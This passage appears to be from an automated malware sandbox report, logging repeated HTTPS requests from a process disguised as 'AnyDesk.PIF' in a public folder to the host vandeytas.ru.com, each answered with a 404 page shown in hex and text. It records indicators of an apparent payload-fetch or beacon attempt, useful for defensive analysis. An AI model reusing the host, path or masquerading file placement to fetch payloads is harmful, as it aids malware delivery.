                                                    2024-11-26 08:39:59 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.44984550.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:00 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:01 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:01 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:01 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.44985250.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:02 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:03 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:03 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:03 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.44985950.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:05 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:05 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:05 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:05 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.44986650.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:07 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:07 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:07 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:07 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.44987050.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:09 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:09 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:09 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:09 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.44987650.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:11 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:12 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:11 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:12 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.44988150.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:13 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:14 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:14 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:14 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.44988750.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:15 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:16 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:16 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:16 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.44989450.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:18 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:18 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:18 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:18 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.44990050.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:20 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:20 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:20 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:20 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.44990750.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:22 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:22 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:22 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:22 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.44991450.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:24 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:25 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:25 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:25 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.44992150.7.187.2184437640C:\Users\Public\Libraries\AnyDesk.PIF
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-26 08:40:26 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:27 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:27 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
